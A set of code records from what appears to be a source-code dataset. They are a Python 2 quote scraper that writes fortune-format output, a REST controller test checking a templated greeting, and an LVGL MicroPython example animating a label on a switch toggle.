AUTHOR_REX = re.compile('\d+\.(\w+)$')
def grabber(base_url, i=1):
url = base_url + "?page=" + str(i)
page = PyQuery(url)
quotes = page(".quoteText")
auth_match = re.search(AUTHOR_REX, base_url)
if auth_match:
author = re.sub('_', ' ', auth_match.group(1))
else:
author = False
# sys.stderr.write(url + "\n")
for quote in quotes.items():
quote = quote.remove('script').text().encode('ascii', 'ignore')
if author:
quote = quote.replace(author, " -- " + author)
print quote
print '%'
if not page('.next_page').hasClass('disabled'):
time.sleep(10)
grabber(base_url, i + 1)
if __name__ == "__main__":
grabber(''.join(sys.argv[1:]))
avg_line_length: 27.488372 | max_line_length: 97 | alphanum_fraction: 0.626058
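The scraper in the record above targets Python 2 (print statements, byte-string handling). The fortune format it emits is simply quote blocks separated by '%' lines; a small Python 3 sketch of that formatting step, with made-up quotes instead of scraped ones:

def to_fortune(quotes):
    # Each entry becomes "<quote>\n -- <author>" followed by a '%' separator line.
    blocks = []
    for text, author in quotes:
        blocks.append(f"{text}\n -- {author}\n%")
    return "\n".join(blocks)


sample = [
    ("Example quote one.", "Example Author"),
    ("Example quote two.", "Example Author"),
]
print(to_fortune(sample))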

hexsha: 65fa614b9639c7c159e427932bcec9916247ffb9 | size: 409 | ext: py | lang: Python
max_stars:  path tests/test_controller_with_output_template.py | repo EvgenySmekalin/winter | head 24b6a02f958478547a4a120324823743a1f7e1a1 | licenses ["MIT"] | count 9 | events 2019-01-24T11:50:19.000Z to 2019-07-05T07:58:46.000Z
max_issues: path tests/test_controller_with_output_template.py | repo EvgenySmekalin/winter | head 24b6a02f958478547a4a120324823743a1f7e1a1 | licenses ["MIT"] | count 100 | events 2019-01-29T08:11:38.000Z to 2020-04-03T12:00:42.000Z
max_forks:  path tests/test_controller_with_output_template.py | repo EvgenySmekalin/winter | head 24b6a02f958478547a4a120324823743a1f7e1a1 | licenses ["MIT"] | count 8 | events 2020-07-16T13:56:50.000Z to 2021-12-27T03:33:23.000Z
from http import HTTPStatus
from rest_framework.test import APIClient
from tests.entities import AuthorizedUser
def test_controller_with_output_template():
client = APIClient()
user = AuthorizedUser()
client.force_authenticate(user)
response = client.get('/with-output-template/?name=John')
assert response.status_code == HTTPStatus.OK
assert response.content == b'Hello, John!'
avg_line_length: 24.058824 | max_line_length: 61 | alphanum_fraction: 0.755501

hexsha: 26ccc12da4dbe6b4fdc02f6df76aa4a1fa4439a2 | size: 1,064 | ext: py | lang: Python
max_stars:  path anim/lv_example_anim_1.py | repo shownb/lv_mpy_examples_v8 | head ae09b2d591ed182f2746274269dade7e6b93a6fe | licenses ["MIT"] | count 3 | events 2021-04-30T10:13:38.000Z to 2021-12-06T05:51:09.000Z
max_issues: path anim/lv_example_anim_1.py | repo shownb/lv_mpy_examples_v8 | head ae09b2d591ed182f2746274269dade7e6b93a6fe | licenses ["MIT"] | count null | events null to null
max_forks:  path anim/lv_example_anim_1.py | repo shownb/lv_mpy_examples_v8 | head ae09b2d591ed182f2746274269dade7e6b93a6fe | licenses ["MIT"] | count 2 | events 2021-06-01T15:35:40.000Z to 2021-11-29T21:21:04.000Z
#!/opt/bin/lv_micropython -i
import time
import lvgl as lv
import display_driver
def anim_x_cb(label, v):
label.set_x(v)
def sw_event_cb(e,label):
sw = e.get_target()
if sw.has_state(lv.STATE.CHECKED):
a = lv.anim_t()
a.init()
a.set_var(label)
a.set_values(label.get_x(), 100)
a.set_time(500)
a.set_path_cb(lv.anim_t.path_overshoot)
a.set_custom_exec_cb(lambda a,val: anim_x_cb(label,val))
lv.anim_t.start(a)
else:
a = lv.anim_t()
a.init()
a.set_var(label)
a.set_values(label.get_x(), -label.get_width())
a.set_time(500)
a.set_path_cb(lv.anim_t.path_ease_in)
a.set_custom_exec_cb(lambda a,val: anim_x_cb(label,val))
lv.anim_t.start(a)
#
# Start animation on an event
#
label = lv.label(lv.scr_act())
label.set_text("Hello animations!")
label.set_pos(100, 10)
sw = lv.switch(lv.scr_act())
sw.center()
sw.add_state(lv.STATE.CHECKED)
sw.add_event_cb(lambda e: sw_event_cb(e,label), lv.EVENT.VALUE_CHANGED, None)
avg_line_length: 22.638298 | max_line_length: 77 | alphanum_fraction: 0.642857
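The same lv.anim_t calls used in the record above can also run an animation unconditionally at startup, without the switch. A short variant, assuming the same lv_micropython environment and display_driver module, and reusing only calls that already appear in the original file:

import lvgl as lv
import display_driver  # assumed to initialise the display, as in the original example

label = lv.label(lv.scr_act())
label.set_text("Hello animations!")
label.set_pos(-100, 10)  # start off-screen on the left

a = lv.anim_t()
a.init()
a.set_var(label)
a.set_values(-100, 100)                  # slide from x=-100 to x=100
a.set_time(500)                          # 500 ms
a.set_path_cb(lv.anim_t.path_overshoot)  # same easing as the checked branch above
a.set_custom_exec_cb(lambda a, val: label.set_x(val))
lv.anim_t.start(a)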